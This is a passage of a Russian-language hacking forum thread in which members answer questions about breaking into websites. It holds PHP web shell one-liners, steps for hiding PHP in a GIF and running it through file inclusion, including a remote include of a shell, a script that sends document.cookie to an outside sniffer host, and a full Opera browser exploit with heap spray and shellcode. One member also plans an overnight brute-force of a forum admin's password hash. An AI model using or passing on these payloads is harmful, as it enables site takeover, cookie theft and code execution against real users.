Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Процитирую тебя же 'Сам то понял что написал?', во первых нах ему переадресация без плушек и тд и судя по 'твой снифер' ты собераешься лить это снифер а не на фейк ? Во вторых - 16 символ обозначает 16 символов а не 66.
     
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Кто нибуть может дать пример кода при котором можно выполнять команды с удаленного компьютера?(php сам знаю чуток но не представляю как это должно выглядеть)(интересно просто пощупать это так как с помощью этого взломали 2ip кто помнит(через whois проходила команда любая))
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    PHP:
    <?php eval($_REQUEST[ev]); ?>
    PHP:
    <?php system($_REQUEST[ev]); ?>
    Щупай :)
     
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    diznt, смотри сорцы любого шелла.
     
  5. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    а ну так это то понятно! :)
    Но каким методом был взломан через whois(2ip.ru)? Или можно как то whois проверить через командную строку?
     
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    diznt, ну хз, как там был взломан, он, но если там можно выпонлять любые команты, то могли залить шелл, как угодно. "copy", "wget", etc...
     
  7. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Ладно...
    Такой вопрос... Как залить шелл через картинку?
    Пробывал для теста в коментах картинки оставить код <html><script>alert('xss!')</script></html>
    Но при переходе на картинку нету xss(
    (через ie 6 заходил)
     
  8. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
    <?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
     
  9. --StraNger--

    --StraNger-- Member

    Joined:
    4 Jan 2009
    Messages:
    63
    Likes Received:
    57
    Reputations:
    5
    через инклуд нужно ее подгружать
     
    1 person likes this.
  10. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    я понял что написал,поздравляю что пощитал символы,глянул на глаз посколько в "<script>img=new Image(); img.src="http://сsite/snif/picture.gif"+document.cookie;</script>" будет на много больше символов,"твой снифер" я написал условно, да там куки не будет,но за то он смог бы перенаправлять юзеров на любые ресурсы в том числе и фэйки.
     
  11. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Ок.
    Значение
    Code:
    var evil = "calc.exe";
    -он воспринимает странно.
    В адресной строке, после перезаполнения появляется следующее:
    Code:
    test.test.ru/calc.exeXXXXXXXXXXXXXXXXXXXXXXX
    Сам эксплоит:
    Code:
    <html>
    <head><title>uh?</title></head>
    <body>
    <script>
    	// k`sOSe 11/15/2008
    	// tested on Windows XP SP3, opera 9.62 international version
    	// vulnerability found by send9
    	// there are many ways to achieve code execution, tons of function pointers to overwrite.
    	// maybe there's one more reliable...
    	var i=0;
    	// push es, pop es
    	var block = unescape("%u0607%u0607"); 
    	// metasploit WinExec c:\WINDOWS\system32\calc.exe
    	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
    	while (block.length < 81920) block += block;
    	var memory = new Array();
    	for (;i<1000;i++) memory[i] += (block + shellcode);
    	var evil = "calc.exe";
            for(var i = 0; i<86438; i++)
                    evil += "X";
    	evil += "R."; 
    	window.location.replace(evil);
    </script>
    </body>
    </html>
     
  12. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    насколько я понимаю в этих сплоитах(я понимаю не очень много)
    evil используется только для того чтобы вылезти из памяти приложения, то есть вызвать переполнение/overflow.
    сама же начинка лежит в переменной shellcode где и происходит вызов calc.exe

    upd по коду обрати внимание на комментарии
    особенно тут
    Code:
    	// push es, pop es
    	var block = unescape("%u0607%u0607"); 
    	// metasploit WinExec c:\WINDOWS\system32\calc.exe
    	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
    	
     
    #7952 geezer.code, 9 Jul 2009
    Last edited: 9 Jul 2009
  13. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Сам тестил? У меня не пашет (.gif)
     
  14. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Не пашет понятие растяжимое, если выпадает в error то значит в картинки какие то символы интерпретируется за начало php кода а если не пашет - не выполняеться код то значит не правильно что то делаешь с php кодом.

    З.Ы. ша дочитал что ты хочешь - что бы картинка выполнялась как php код ее нужно либо проинклюдить в этот самый php код либо добавить расширения картинки в addtype - что бы она исполнялась как php код - сама по себе она не исполниться и конечно в браузере ты не увидешь алерта - браузер будет интерпретировать то что передает сервер по соответствующему заголовку HTTP.
     
    #7954 PaCo, 9 Jul 2009
    Last edited: 9 Jul 2009
  15. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Собственно видел в видео что как то в картинку подставляли алерт... заходили по картинке (заливали ее в ручную на локалхост) и вылетал алерт

    не выполняеться код то значит не правильно что то делаешь с php кодом.

    да? делал как Ch3ck и все равно. И в инете все облазил и испробывал. Не хочет
     
  16. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Тебе уже 2 человека говорят - ЧТО НУЖНО ПРОИНКЛЮДИТЬ КАРТИНКУ В PHP КОД(который в итоге в баузере будет выводиться как текст с Content-type:text/html) или с недостаточной фильтрацией в Exif запихнуть туда код и тогда тебе и алерт будет и phpinfo(при условии что это инклюд без всяких фильтров) и в видео именно так и происходит.
     
    #7956 PaCo, 9 Jul 2009
    Last edited: 9 Jul 2009
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    так я инклудил
    (то есть в конце ставил <?php include("2.gif"); ?> 2.gif норм картинка в том же каталоге) но в итоге ничего не изменялось (вроде как)
     
    1 person likes this.
  18. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Извините за глупый вопрос. Сколько символов минимальная длинна пароля в phpBB 2.0.17. Просто есть хэш админа и надо поставить на брут на ночь. Вот чтобы не брутить лишние надо узнать мин.длинну.
     
  19. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Странно... В конце картинки пишешь <?php include('http://site.com/shell.php'); ?> и запускаешь картинку http://site.com/index.php?path=../../../../../image.gif всё. Откроется шелл, если конечно allow_url_include=on.
     
    #7959 Ch3ck, 9 Jul 2009
    Last edited: 9 Jul 2009
    1 person likes this.
  20. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    а) понял про что ты...
    Не... Я имею ввиду чисто шелл через картинку залить при этом нету lfi/rfi !
     
Thread Status:
Not open for further replies.